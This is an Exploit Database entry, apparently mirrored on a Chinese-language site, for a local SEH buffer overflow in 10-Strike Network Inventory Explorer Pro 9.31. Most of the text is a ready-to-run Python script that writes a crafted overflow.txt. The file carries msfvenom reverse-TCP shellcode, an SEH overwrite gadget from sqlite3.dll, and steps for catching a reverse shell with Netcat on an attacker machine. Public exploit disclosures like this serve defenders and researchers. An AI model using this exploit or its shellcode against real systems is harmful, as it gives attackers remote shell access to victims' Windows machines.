10-Strike Network Inventory Explorer Pro 9.31 – Buffer Overflow (SEH)

• Exploit Database
• 17 阅读

• 作者： ro0k
  日期： 2021-11-02
• 类别：

  • local
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/50472/

• # Exploit Title: 10-Strike Network Inventory Explorer Pro 9.31 - Buffer Overflow (SEH)
  # Date: 2021-10-31
  # Exploit Author: ro0k
  # Vendor Homepage: https://www.10-strike.com/
  # Software Link: https://www.10-strike.com/networkinventoryexplorer/network-inventory-pro-setup.exe
  # Version: 9.31
  # Tested on: Windows 10 x64 Education 21H1 Build 19043.928 
  
  # Proof of Concept:
  # 1.Run python2 exploit.py to generate overflow.txt
  # 2.Transfer overflow.txt to the Windows 10 machine
  # 3.Setup Netcat listener on attacker machine 
  # 4.Open 10-Strike Network Inventory Explorer Pro
  # 5.Select Computers tab from the uppermost set of tabs
  # 6.Select From Text File option
  # 7.Open overflow.txt
  # 8.Receive reverse shell connection on attacker machine! 
  
  #!/usr/bin/env python
  import struct
  
  charslist = "" 
  badchars = [0x00,0x09,0x0a,0x0d,0x3a,0x5c] 
  
  for i in range (0x00, 0xFF+1):
  if i not in badchars: 
  charslist += chr(i) 
  
  #msfvenom -p windows/shell_reverse_tcp LHOST=10.2.170.242 LPORT=443 EXITFUNC=thread -f c -a x86 -b "\x00\x09\x0a\x0d\x3a\x5c"
  shellcode = ("\xd9\xc8\xd9\x74\x24\xf4\x58\x33\xc9\xbb\xc6\xbc\xd3\x19\xb1"
  "\x52\x83\xc0\x04\x31\x58\x13\x03\x9e\xaf\x31\xec\xe2\x38\x37"
  "\x0f\x1a\xb9\x58\x99\xff\x88\x58\xfd\x74\xba\x68\x75\xd8\x37"
  "\x02\xdb\xc8\xcc\x66\xf4\xff\x65\xcc\x22\xce\x76\x7d\x16\x51"
  "\xf5\x7c\x4b\xb1\xc4\x4e\x9e\xb0\x01\xb2\x53\xe0\xda\xb8\xc6"
  "\x14\x6e\xf4\xda\x9f\x3c\x18\x5b\x7c\xf4\x1b\x4a\xd3\x8e\x45"
  "\x4c\xd2\x43\xfe\xc5\xcc\x80\x3b\x9f\x67\x72\xb7\x1e\xa1\x4a"
  "\x38\x8c\x8c\x62\xcb\xcc\xc9\x45\x34\xbb\x23\xb6\xc9\xbc\xf0"
  "\xc4\x15\x48\xe2\x6f\xdd\xea\xce\x8e\x32\x6c\x85\x9d\xff\xfa"
  "\xc1\x81\xfe\x2f\x7a\xbd\x8b\xd1\xac\x37\xcf\xf5\x68\x13\x8b"
  "\x94\x29\xf9\x7a\xa8\x29\xa2\x23\x0c\x22\x4f\x37\x3d\x69\x18"
  "\xf4\x0c\x91\xd8\x92\x07\xe2\xea\x3d\xbc\x6c\x47\xb5\x1a\x6b"
  "\xa8\xec\xdb\xe3\x57\x0f\x1c\x2a\x9c\x5b\x4c\x44\x35\xe4\x07"
  "\x94\xba\x31\x87\xc4\x14\xea\x68\xb4\xd4\x5a\x01\xde\xda\x85"
  "\x31\xe1\x30\xae\xd8\x18\xd3\xdb\x1e\x88\xd1\xb4\x1c\xcc\x14"
  "\xfe\xa8\x2a\x7c\x10\xfd\xe5\xe9\x89\xa4\x7d\x8b\x56\x73\xf8"
  "\x8b\xdd\x70\xfd\x42\x16\xfc\xed\x33\xd6\x4b\x4f\x95\xe9\x61"
  "\xe7\x79\x7b\xee\xf7\xf4\x60\xb9\xa0\x51\x56\xb0\x24\x4c\xc1"
  "\x6a\x5a\x8d\x97\x55\xde\x4a\x64\x5b\xdf\x1f\xd0\x7f\xcf\xd9"
  "\xd9\x3b\xbb\xb5\x8f\x95\x15\x70\x66\x54\xcf\x2a\xd5\x3e\x87"
  "\xab\x15\x81\xd1\xb3\x73\x77\x3d\x05\x2a\xce\x42\xaa\xba\xc6"
  "\x3b\xd6\x5a\x28\x96\x52\x7a\xcb\x32\xaf\x13\x52\xd7\x12\x7e"
  "\x65\x02\x50\x87\xe6\xa6\x29\x7c\xf6\xc3\x2c\x38\xb0\x38\x5d"
  "\x51\x55\x3e\xf2\x52\x7c")
  
  #pattern_offset.rb -l 250 -q 41316841
  offset = 213
  
  #nasm > jmp short 8
  nseh = "\xeb\x06\x90\x90"
  junk = "A" * (offset - len(nseh))
  
  #0x61e012f6 : pop edi # pop ebp # ret|{PAGE_EXECUTE_READ} [sqlite3.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v3.12.2 (C:\Program Files (x86)\10-Strike Network Inventory Explorer Pro\sqlite3.dll)
  seh = struct.pack("<I", 0x61e012f6)
  
  #metasm > sub esp,0x10
  subesp10="\x83\xec\x10"
  payload = shellcode
  
  buffer = junk + nseh + seh + subesp10 + payload
  
  f = open("overflow.txt", "w")
  f.write(buffer)
  f.close()